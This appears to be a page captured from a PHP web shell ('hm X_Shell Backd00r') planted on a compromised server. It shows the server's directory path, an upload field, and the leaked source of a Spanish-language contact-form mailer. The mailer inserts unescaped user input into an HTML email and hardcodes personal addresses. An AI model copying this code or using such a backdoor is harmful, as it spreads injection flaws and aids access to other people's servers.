[#] hm X_Shell Backd00r [#]

Current Path : /var/www/clients/client35/web46/web/formcontacto/
Upload File :
Current File : /var/www/clients/client35/web46/web/formcontacto/process2.php

<?php
require("class.phpmailer.php");
  
  $mail = new PHPMailer();

  $nombre   = $_REQUEST['nombre']; 
  $telefono = $_REQUEST['telefono'];
  $email    = $_REQUEST['email']; 
  $mensaje  = $_REQUEST['mensaje'];

  $casilla="raf4@live.com.mx"; 
  $asunto = 'Contacto GridJobs';
  $cabeceras = "MIME-Version: 1.0\r\n";
  $cabeceras .= "Content-Type: text/html; charset=UTF-8\r\n";
  $cabeceras .= 'From: inforafapalafox@gmail.com' . "\r\n";
		
 $cuerpo_mail="<html> 
      <head> 
       	<title>Aristos Internacional</title> 
		<meta http-equiv=\"\" content=\"text/html; charset=iso-8859-1\"> 
      </head> 
	  <body>
	   <div id='contenedor'>
	      <div style='background:#eeeeef;margin:30px;border:3px solid #d67221;position: absolute;left: 50%;top: 25%;width: 500px;height: 800px;margin-top: -150px;margin-left: -200px;overflow:hidden;border: 5px solid #ccc;border-radius:5px;-webkit-border-radius:5px;-moz-border-radius:5px;box-shadow: 0 0 5px 1px #333;'>
		  
		  <div style='padding-bottom:5px;border-bottom:2px solid #ac8039;box-shadow:0 0 5px 1px #ac8039;background:#FFF;'>
			 <img src='http://www.aristosintl.com/prueba/admin/images/log.jpg' style='width:150px;'>
		   </div> 
		   
		   <div align='center' style='width:450px; margin-left:10px; margin-right:10px;'>
		   
<span style='width:90%;padding:10px 0;display:block;margin:3px 0;color:#d67221;font-size:14px;font-weight:800;text-transform:uppercase;'>
Nombre: </span> 

<span style='display:block;padding:10px; width:270px;background:none;margin: 3px 30px 10px; background:rgba(255,255,255,0.8); color:#385a79; border:3px solid #CCC; border-radius:3px;text-align:left;'>".$nombre."</span>

<span style='width:90%;padding:10px 0;display:block;margin:3px 0;color:#d67221;font-size:14px;font-weight:800;text-transform:uppercase;'>
Telefono: </span>		 

<span style='display:block;padding:10px; width:270px;background:none;margin: 3px 30px 10px; background:rgba(255,255,255,0.8); color:#385a79; border:3px solid #CCC; border-radius:3px;text-align:left;'>".$telefono."</span> 

<span style='width:90%;padding:10px 0;display:block;margin:3px 0;color:#d67221;font-size:14px;font-weight:800;text-transform:uppercase;'>
Correo electronico: </span>		 

<span style='display:block;padding:10px; width:270px;background:none;margin: 3px 30px 10px; background:rgba(255,255,255,0.8); color:#385a79; border:3px solid #CCC; border-radius:3px;text-align:left;'>".$email."</span>

<span style='width:90%;padding:10px 0;display:block;margin:3px 5px; color:#d67221; font-size:14px; font-weight:800; text-transform:uppercase;'> Mensaje: </span>		 

<span style='display:block;padding:10px; width:450px; height:300px; background:none;margin: 3px 8px 10px; background:rgba(255,255,255,0.8); color:#385a79; border:3px solid #CCC; border-radius:3px;text-align:left;overflow:auto;'>".$mensaje."</span>

	   </div>
	  </div>
	 </div>	  
	</body>
</html>"; 
		
if(!mail($casilla,$asunto,$cuerpo_mail,$cabeceras)){
	 echo "No enviado";
	}

?>

Mr.hm X_Shell Backd00r 1.0, Coded By Mr.hm X_Shell Backd00r